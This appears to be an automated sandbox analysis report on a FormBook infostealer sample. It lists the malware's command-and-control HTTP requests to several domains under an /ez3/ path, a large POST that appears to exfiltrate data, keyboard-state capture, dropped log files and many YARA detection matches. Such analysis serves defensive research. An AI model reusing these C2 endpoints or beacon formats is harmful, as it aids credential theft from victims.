7a 62 30 53 38 62 69 52 31 4b 6b 2d 44 53 38 39 4a 49 6a 65 28 64 51 38 33 6d 70 50 49 37 58 70 68 63 54 38 64 69 33 64 4f 56 4f 38 44 56 57 46 6e 49 6a 33 57 63 71 46 72 33 36 47 32 58 64 72 4c 68 79 53 38 68 47 77 49 50 45 53 36 58 37 36 30 4c 52 48 6e 48 63 67 68 70 73 52 43 47 4e 6c 4b 38 75 5a 7e 45 72 4b 4d 7a 4d 57 67 35 4e 50 42 50 4b 53 78 52 6c 35 6e 4f 79 6e 45 76 50 58 64 58 42 47 43 6d 41 4d 53 55 7e 45 6c 69 75 51 4a 4a 64 53 7a 6c 68 4a 79 54 67 58 4e 4b 50 62 7e 51 75 4a 4a 58 62 5f 62 39 6f 66 75 46 6f 64 7a 54 76 41 46 74 44 44 79 42 34 41 64 4e 28 6e 54 46 33 55 4f 64 46 30 52 5a 34 75 74 47 5a 61 67 63 4c 61 44 4d 32 6e 58 75 6c 56 7e 70 62 49 48 45 54 4a 69 6b 50 37 53 78 67 71 6a 32 63 73 28 49 58 6c 49 37 46 79 4c 6a 4a 30 61 2d 35 45 45 79 33 75 76 63 6f 77 6a 30 7a 31 4d 59 6b 4f 69 39 76 74 46 54 58 33 46 48 30 78 4c 4b 79 75 76 53 4a 72 54 4b 6e 4a 69 38 61 4a 4e 4e 49 4e 72 36 53 56 64 72 4c 37 48 39 53 37 37 4d 61 6b 39 7a 58 63 6c 64 42 59 71 59 43 4b 33 61 45 77 49 59 5a 31 57 31 62 71 34 6b 57 64 57 72 30 64 78 39 39 45 66 48 55 6f 6a 63 71 5f 46 48 69 6e 5a 6d 7e 51 35 70 77 33 36 5f 78 74 43 4e 4d 59 63 64 42 44 49 4d 4a 34 53 38 4d 34 4c 36 46 39 38 6c 4c 78 6b 41 48 69 28 6c 6a 31 37 65 33 6a 48 65 31 39 7e 51 6b 54 4d 74 4e 34 4d 5a 70 53 65 73 68 73 64 4a 39 68 33 6d 6c 67 37 49 7a 68 43 49 58 71 4f 46 66 4c 64 6c 79 69 6f 68 47 78 77 78 75 54 5a 65 7e 6a 34 76 6d 2d 72 7a 6a 5f 65 36 70 62 54 6c 67 79 67 4a 30 59 43 43 31 30 36 56 4d 79 6b 62 64 51 6b 34 78 38 55 34 78 5f 42 6f 30 53 67 43 54 79 4e 6a 6e 33 39 54 4e 31 73 67 31 4d 71 74 36 4e 57 4a 67 4a 65 46 45 37 73 66 75 6f 58 2d 39 58 43 4f 31 59 68 33 46 78 41 30 66 47 51 39 67 32 6c 44 62 31 33 7a 6a 38 7e 63 42 74 74 68 69 47 37 58 33 55 52 58 44 37 44 6a 6f 4d 4b 77 78 65 6c 69 61 34 74 58 59 47 31 54 58 32 38 38 58 33 45 47 50 73 49 72 61 50 52 69 37 39 53 53 71 6d 74 78 4a 56 76 69 53 75 6d 79 6f 63 49 65 63 2d 6c 6b 31 35 54 6a 41 4c 32 75 75 36 6b 6c 52 45 4b 78 49 51 4b 77 56 70 35 41 6f 30 62 33 51 43 59 31 78 4d 6b 76 68 71 6e 5
          Source: global trafficHTTP traffic detected: GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1Host: www.pawlowski.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ez3/?dL3=oh/nSlzENG0qUOAwPXeIQOtwW6r8d6QREB9M6hBu+NM+9UHPsG9g+Ot2gFGRe3aStlqv&f2JLp=0ZWpXH1 HTTP/1.1Host: www.lcpierpontphotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ez3/?dL3=7CEQ+k742KWuCXQBHgFuLA7JV8UfVcRSEMIHryxdtZ0WgVQp3Q3kFEzSW7ScRDzGFE92&f2JLp=0ZWpXH1 HTTP/1.1Host: www.tylermercer.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ez3/?dL3=X3u3PzGnlM4B8cIThswW3+TZhgNWE0aZtyVvUn4Lv16SAoXv0FRCFRv3M3XIz91P9rzv&f2JLp=0ZWpXH1 HTTP/1.1Host: www.allixanes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1Host: www.pawlowski.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.oraning.net
          Source: unknownHTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.lcpierpontphotography.comConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.lcpierpontphotography.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lcpierpontphotography.com/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 67 44 7a 64 4d 41 6d 55 4a 44 4e 43 4b 2d 73 32 4e 51 4f 57 43 49 52 6f 63 37 50 49 65 71 64 50 57 45 51 35 70 42 78 76 75 39 4d 5a 33 32 58 50 6a 6c 6c 35 75 61 51 6f 37 30 4b 56 59 55 61 47 34 55 54 37 36 58 37 66 44 55 58 32 7e 62 6e 63 79 61 61 49 45 4f 75 31 59 66 42 7a 35 61 77 6f 72 56 69 53 72 2d 35 7a 43 41 4c 70 4b 54 48 34 67 47 54 47 79 78 4e 39 47 43 6d 48 5a 68 6f 43 34 34 70 75 38 39 45 51 50 6d 42 7a 70 56 46 4c 72 49 6f 6c 55 5a 6e 4e 4a 44 56 4d 79 4c 56 59 74 46 42 75 47 7a 77 79 76 2d 45 45 58 57 34 51 59 66 38 56 33 7a 66 70 7a 6e 69 46 48 49 6f 71 62 4d 28 32 7e 4a 43 57 69 54 63 56 49 59 78 55 6b 67 73 53 31 71 6e 53 4e 5f 63 4b 43 4c 65 5a 5a 5f 39 6b 49 36 4f 41 59 75 72 39 67 58 6f 6c 46 78 61 5f 6f 6e 55 6c 4d 5a 53 6d 35 48 70 52 68 4d 54 41 28 39 76 59 52 4c 41 56 30 53 46 66 43 30 52 6e 4e 61 48 6c 42 53 7a 4f 7e 4c 4e 75 37 51 6c 7a 32 58 53 46 62 42 74 77 32 6d 65 44 6e 78 65 38 4c 52 67 37 7e 56 34 51 6a 4f 54 7a 59 4c 31 46 65 54 38 47 39 73 6f 30 45 73 70 76 39 41 6d 68 39 58 4b 43 4e 61 34 42 57 6b 55 74 56 77 4e 59 36 51 71 6f 38 37 72 56 31 6c 68 6d 72 34 38 32 57 37 33 5f 4c 51 70 5a 44 39 34 45 79 6a 72 69 51 31 48 5a 64 75 46 6d 59 44 48 76 42 34 48 59 66 52 43 59 77 62 7e 6c 72 34 7a 46 35 6d 69 74 6a 36 6a 6a 69 32 56 49 28 73 39 34 74 32 6f 45 6a 53 57 71 30 50 33 79 32 63 4d 59 58 33 48 61 51 61 5a 79 34 30 72 46 70 75 72 5a 71 6c 28 4f 4a 35 4e 5f 64 5a 47 6b 41 47 4d 32 30 77 4f 64 48 52 6e 6d 4a 4e 74 57 30 6c 66 74 71 31 6c 4b 65 45 65 74 4f 77 53 76 34 38 52 79 4c 71 41 7a 52 65 73 64 55 56 73 50 73 75 72 76 50 61 4a 66 45 47 6e 37 53 73 59 39 41 4a 39 6e 35 46 6b 44 59 58 6b 32 7e 50 4f 57 6b 6c 6c 56 6b 57 28 4f 4d 4a 54 4d 48 69 43 34 76 6b 34 35 52 58 6b 65 41 53 54 69 72 5f 28 37 64 73 59 53 7a 5a 59 4c 52 49 44 32 65 48 68 6a 42 35 63 45 46 6e 55 45 66 46 4a 31 34 53 4b 64 36 36 71 42 7e 79 6b 75 37 77 58 33 70 2d 38 6c 31 74 43 4d 73 6e 66 58 6a 46 5a 67 7e 78 35 72 28 64 69 31 44 4a 4f 50 71 65 79 53 6c 33 39 47 6f 31 4f 74 65 64 59 51 6c 63 63 2d 34 5a 41 52 43 52 31 6d 58 4b 7e 48 34 70 64 65 69 43 6a 41 45 63 61 37 45 72 75 57 28 64 78 4e 72 37 34 47 52 69 70 37 55 4d 4b 5f 44 62 4f 33 6d 77 6a 36 68 67 65 6b 67 6d 44 77 35 77 65 74 6b 52 7a 66 36 4f 6c 73 52 79 79 70 74 4e 74 72 6e 5f 62 49 30 44 50 52 69 6d 4f 58 67 42 78 49 64 78 5a 6b 76 63 61 54 31 6c 79 70 68 4c 61 4f 75 4e 71 5f 56 49 77 46 28 4c 44 70 54 42 51 44 6a 33 6e 53 32 5a 41 49 43 31 43 62 6d 49 65 4e 4a 6f 72 6f 59 7a 57 55 6a 45 67 63 77 4e 51 53 72 70 4c 69 6b 6a 36 4e 6b 5
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Tue, 19 May 2020 08:38:38 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: svchost.exe, 00000005.00000002.2486714198.00000000035A9000.00000004.00000001.sdmpString found in binary or memory: http://www.allixanes.com
          Source: svchost.exe, 00000005.00000002.2486714198.00000000035A9000.00000004.00000001.sdmpString found in binary or memory: http://www.allixanes.com/ez3/
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.889874232.0000000007B92000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
          Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehpC:
          Source: svchost.exe, 00000005.00000002.2481178360.0000000000827000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.896488049.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          Source: C:\Users\user\Desktop\xg28sL5JDm.exeCode function: 0_2_00449F24 GetKeyboardState,0_2_00449F24
          Source: sdv88p2lg.exe, 0000000E.00000002.1485735250.0000000000790000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.1506249884.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2481462321.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.1503710394.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.1503886889.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.923330823.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.1.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.xg28sL5JDm.exe.2200000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.sdv88p2lg.exe.2600000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.xg28sL5JDm.exe.2200000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.sdv88p2lg.exe.2270000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.sdv88p2lg.exe.2270000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.xg28sL5JDm.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.sdv88p2lg.exe.2600000.3.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\svchost.exeDropped file: C:\Users\user\AppData\Roaming\K4O1B2B4\K4Ologri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped file: C:\Users\user\AppData\Roaming\K4O1B2B4\K4Ologrf.iniJump to dropped file
          Source: C:\Windows\SysWOW64\svchost.exeDropped file: C:\Users\user\AppData\Roaming\K4O1B2B4\K4Ologrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.1506249884.0000000000A30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.1506249884.0000000000A30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2481462321.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2481462321.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.1503710394.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.1503710394.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.1503886889.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.1503886889.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.923330823.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.923330823.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.1.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.1.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.2.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.xg28sL5JDm.exe.2200000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.xg28sL5JDm.exe.2200000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 14.2.sdv88p2lg.exe.2600000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 14.2.sdv88p2lg.exe.2600000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.xg28sL5JDm.exe.2200000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
